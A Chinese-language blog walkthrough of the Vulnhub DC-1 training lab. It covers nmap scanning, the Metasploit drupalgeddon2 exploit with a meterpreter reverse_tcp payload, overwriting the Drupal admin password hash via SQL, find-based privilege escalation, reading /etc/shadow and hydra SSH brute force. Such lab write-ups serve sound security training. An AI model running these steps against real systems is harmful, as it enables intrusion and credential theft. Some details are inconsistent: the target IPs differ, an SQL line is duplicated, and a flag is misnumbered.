前言
我们都知道, 对靶机的渗透, 可以宽阔自己的解题思路, 练习并熟悉相关操作命令, 提高自己的能力. 下面我就对 Vulnhub 的 DC-1 靶机进行渗透, 靶机设置了 5 个 flag, 咱们依次找到它. 并通过图文形式讲解涉及到的相关知识点. DC-1 的靶机下载地址为: https://www.vulnhub.com/entry/dc-1,292/
目标机 IP 地址: 198.162.9.138
攻击机 kali IP 地址: 198.132.9.129
想要了解 SQL 注入原理的可以看我的这两篇文章:
想要了解 XSS 原理的可以看我的这两篇文章:
- https://www.cnblogs.com/lxfweb/p/12709061.html
- https://www.cnblogs.com/lxfweb/p/13286271.html
目标探测
渗透测试的第一步, 是信息收集, 这一步很重要, 关系到后面的渗透步骤. 下面我们对目标机进行主机发现. 因为都在局域网, 所以使用内网扫描.
命令: arp-scan -l
发现主机 IP 后, 使用 nmap 进行端口扫描.
命令:
nmap -v -A 192.168.9.138
发现目标机开放了 22,80,111 端口.
寻找 flag1
现在我们以 80 端口作为突破口. 通过指纹识别, 这里用到的是 whatweb, 发现是 Drupal cms 版本是 7. 下面使用 MSF 进行渗透攻击. 打开工具, 搜索 Drupal 的相关模块.
这里我选择第 4 个模块. 读者可以尝试其他模块.
输入命令:
use exploit/unix/webapp/drupal_drupalgeddon2
加载 exploit. 然后查看相关 payload, 输入命令: show payloads
这里选择 15, 输入:
set payload PHP/meterpreter/reverse_tcp
接着输入: show options 打开配置选项.
标为 yes 的都是必须配置的. 现在配置一下 RHOSTS(目标机 IP),LHOSTS(攻击机 IP), 其他默认就行了.
发现获取到了 meterpreter shell. 现在查看一下目录.
发现目标, 找到 flag1.
寻找 flag2
查看 flag1 文件, 发现有提示, 咱们寻找配置文件.
接下来进入 sites 目录下, 接着进入 default 目录. 查看 settings.PHP 文件.
找到了 flag2.
寻找 flag3
我们发现配置文件中有数据库账号和密码. 现在尝试登陆数据库.
现在进入目标机 shell 环境, 查看端口情况. 命令: netstat -ano
我们注意到, 数据库只允许本地连接. 所以, 我们需要反弹一个 shell 出来.
采用 python 调用系统命令:
python -c 'import pty;pty.spawn("/bin/bash")'
发现反弹成功, 接下来输入数据库账号密码连接 MySQL 数据库.
下面, 我们查看库, 查看表.
找关键的表, 发现里面存在 users 表. 打开它.
发现了 admin 账户和密码. 但是这个密码有点复杂, 破解有点困难. 所以想想其他的方法. 这里我们登陆了对方数据库, 所以, 我们采用对方的加密方式覆盖掉原来的密码就可以了.
先调用命令生成咱们设置的密文. 明文是 xfaicl. 命令:
PHP scripts/password-hash.sh xfaicl
接着替换掉原来的密码.
- update users set pass="$S$DxQCTfic1drhqY7jbCf62drw/T204r3is./KmIUKEzlQUpfHx1RQ" where uid=1
- <s="$S$DxQCTfic1drhqY7jbCf62drw/T204r3is./KmIUKEzlQUpfHx1RQ" where uid=1;
替换成功后, 咱们登陆网站. 依次点击, 发现 flag3.
寻找 flag4
点击 flag3 后, 关注点放到 passwd 文件和 shadow 文件. Linux 为了考虑安全性, 用单独的 shadow 文件存储 Linux 用户的密码信息, 并且只有 root 用户有权限读取此文件. 所以下一步, 我们要考虑的是提权了.
采用 find 提权.
提权成功后, 查看 shadow 文件.
发现 flag4 是一个账户. 猜测是 SSH 账户, 这里尝试暴力破解. 使用 hydra 破解成功.
破解到密码是 orange, 接下来登陆 SSH. 发现 flag4, 查看它.
里面内容说, 还有一个 flag4, 在 root 目录下, 刚才咱们已经提升权限了. 所以直接查看.
小结
目标靶机一共存在 5 个 flag, 咱们已经全部找到, 上面用到的一些方法希望对大家有帮助.
来源: https://www.cnblogs.com/lxfweb/p/13364770.html